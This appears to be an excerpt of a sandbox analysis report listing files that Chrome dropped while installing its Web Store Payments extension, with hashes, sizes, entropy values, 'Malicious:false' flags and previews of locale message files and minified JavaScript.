                                                                                                                                                                                                                        SHA1:8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
                                                                                                                                                                                                                        SHA-256:C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
                                                                                                                                                                                                                        SHA-512:2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):641
                                                                                                                                                                                                                        Entropy (8bit):4.61125938671415
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
                                                                                                                                                                                                                        MD5:98D43E4B1054A65DF3FA3CC40AB6FB6D
                                                                                                                                                                                                                        SHA1:46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
                                                                                                                                                                                                                        SHA-256:113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
                                                                                                                                                                                                                        SHA-512:A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):744
                                                                                                                                                                                                                        Entropy (8bit):4.918620852166656
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
                                                                                                                                                                                                                        MD5:DB2EDF1465946C06BD95C71A1E13AE64
                                                                                                                                                                                                                        SHA1:FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
                                                                                                                                                                                                                        SHA-256:FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
                                                                                                                                                                                                                        SHA-512:4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):647
                                                                                                                                                                                                                        Entropy (8bit):4.640777810668463
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
                                                                                                                                                                                                                        MD5:8DF215D1EFBDABB175CCDD68ED8DCB0A
                                                                                                                                                                                                                        SHA1:2B374462137A38589A73FDD00A84CBDC7E50F9F4
                                                                                                                                                                                                                        SHA-256:7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
                                                                                                                                                                                                                        SHA-512:C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):617
                                                                                                                                                                                                                        Entropy (8bit):4.5101656584816885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
                                                                                                                                                                                                                        MD5:3943FA2A647AECEDFD685408B27139EE
                                                                                                                                                                                                                        SHA1:0129DD19D28373359530B3B477FE8A9279DABB7D
                                                                                                                                                                                                                        SHA-256:18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
                                                                                                                                                                                                                        SHA-512:42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):743
                                                                                                                                                                                                                        Entropy (8bit):4.913927107235852
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
                                                                                                                                                                                                                        MD5:D485DF17F085B6A37125694F85646FD0
                                                                                                                                                                                                                        SHA1:24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
                                                                                                                                                                                                                        SHA-256:7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
                                                                                                                                                                                                                        SHA-512:0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):630
                                                                                                                                                                                                                        Entropy (8bit):4.52964089437422
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJJMkbGGJMkb+WYpU34OACwz+dgNPGFZO8ZpU34JgpXLSb03OyZnLAOfTYLdID:1HErMkaqMk6WYpTOcb8ZpDgdZOGAOf8Y
                                                                                                                                                                                                                        MD5:D372B8204EB743E16F45C7CBD3CAAF37
                                                                                                                                                                                                                        SHA1:C96C57219D292B01016B37DCF82E7C79AD0DD1E8
                                                                                                                                                                                                                        SHA-256:B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
                                                                                                                                                                                                                        SHA-512:33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):945
                                                                                                                                                                                                                        Entropy (8bit):4.801079428724355
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:1HEKa1dDa1/WYp6UFi72SmlG8ZpyactrW2SAOGAOfvSLD:WK2DNYp6U4y3bpyLxwGFW
                                                                                                                                                                                                                        MD5:83E2D1E97791A4B2C5C69926EFB629C9
                                                                                                                                                                                                                        SHA1:429600425CB0F196DDD717F940E94DBD8BFF2837
                                                                                                                                                                                                                        SHA-256:2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
                                                                                                                                                                                                                        SHA-512:60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\tr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):631
                                                                                                                                                                                                                        Entropy (8bit):4.710869622361971
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ9Y8GG9Y8+WYpU34wWT+dgGb0GO8ZpU34wryd7T03OyZnLAOfTYGbPKG:1HE0jWYpyRnG8Zpyr/OGAOfFPn
                                                                                                                                                                                                                        MD5:2CEAE0567B6BB1D240BBAD690A98CA3B
                                                                                                                                                                                                                        SHA1:5944346FBD4A0797B13223895995CAB58E9ECD23
                                                                                                                                                                                                                        SHA-256:A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
                                                                                                                                                                                                                        SHA-512:108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):720
                                                                                                                                                                                                                        Entropy (8bit):4.977397623063544
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ7wILkSlXZGG7wILkSlXZ+WYpU34zb1Oy2P+dgSV1EjiTO8ZpU347qtfP2CTW:1HElwEkK4uwEkK8WYpd/dTV1e8Zptq5S
                                                                                                                                                                                                                        MD5:AB0B56120E6B38C42CC3612BE948EF50
                                                                                                                                                                                                                        SHA1:8B3F520E5713D9F116D68E71DAEED1F6E8D74629
                                                                                                                                                                                                                        SHA-256:68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
                                                                                                                                                                                                                        SHA-512:CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):695
                                                                                                                                                                                                                        Entropy (8bit):4.855375139026009
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJMAZrSFZGGMAZrSFZ+WYpU34WFHoz+dgdklzoO8ZpU34NFHoz03OyZnLAOfTU:1HEI4B8WYpAKytFZ8ZpXKMOGAOfd6D
                                                                                                                                                                                                                        MD5:7EBB677FEAD8557D3676505225A7249A
                                                                                                                                                                                                                        SHA1:F161B4B6001AEAEAB246FF8987F4D992B48D47BE
                                                                                                                                                                                                                        SHA-256:051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
                                                                                                                                                                                                                        SHA-512:74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\zh_CN\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):595
                                                                                                                                                                                                                        Entropy (8bit):5.210259193489374
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ01GG01+WYpU34zeHz+dgfO8ZpU34YKiO03OyZnLAOfTYB6U:1HEpIWYpISv8Zp+JOGAOfa6U
                                                                                                                                                                                                                        MD5:BB73BF561BB79F89D9BF7C67C5AE5C65
                                                                                                                                                                                                                        SHA1:2FADD3A1959B29C44830033A35C637D0311A8C9C
                                                                                                                                                                                                                        SHA-256:D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
                                                                                                                                                                                                                        SHA-512:627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):634
                                                                                                                                                                                                                        Entropy (8bit):5.386215984611281
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:1HEJ2j62GG2j62+WYpU34m7T+dgc8nOO8ZpU34mvIO03OyZnLAOfTYAuH:1HEuSZCWYpsStwP8ZpROGAOfCH
                                                                                                                                                                                                                        MD5:5FF50C673CC0C661D615F0CFD0E6DCA0
                                                                                                                                                                                                                        SHA1:60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
                                                                                                                                                                                                                        SHA-256:C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
                                                                                                                                                                                                                        SHA-512:361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):7780
                                                                                                                                                                                                                        Entropy (8bit):5.791315351651491
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:RktDNJ2UzsL5KcASyoH+CouKP/iNGRo/oRHMIT:AZQflcsU
                                                                                                                                                                                                                        MD5:0834821960CB5C6E9D477AEF649CB2E4
                                                                                                                                                                                                                        SHA1:7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
                                                                                                                                                                                                                        SHA-256:52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
                                                                                                                                                                                                                        SHA-512:9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\craw_background.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):544643
                                                                                                                                                                                                                        Entropy (8bit):5.385396177420207
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:abyfBNC2FRdjiRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+h72W3GB0n:Ft/g
                                                                                                                                                                                                                        MD5:6EEBED29E6A6301E92A9B8B347807F5F
                                                                                                                                                                                                                        SHA1:65DFB69B650560551110B33DCBA50B25E5B876DE
                                                                                                                                                                                                                        SHA-256:04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
                                                                                                                                                                                                                        SHA-512:FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var d,e=e||{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\craw_window.js
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):261316
                                                                                                                                                                                                                        Entropy (8bit):5.444466092380538
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:I5vU7I6s2M9duIWFCbmYJ4tnFWdqpMad2vywhIp81QFv9F9nNsZgiDdOFlV/mZmc:I5vqFCb2p8Gx9FNNsZ9Dd/ceR
                                                                                                                                                                                                                        MD5:1709B6F00A136241185161AA3DF46A06
                                                                                                                                                                                                                        SHA1:33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
                                                                                                                                                                                                                        SHA-256:5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
                                                                                                                                                                                                                        SHA-512:26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
                                                                                                                                                                                                                        Malicious:false
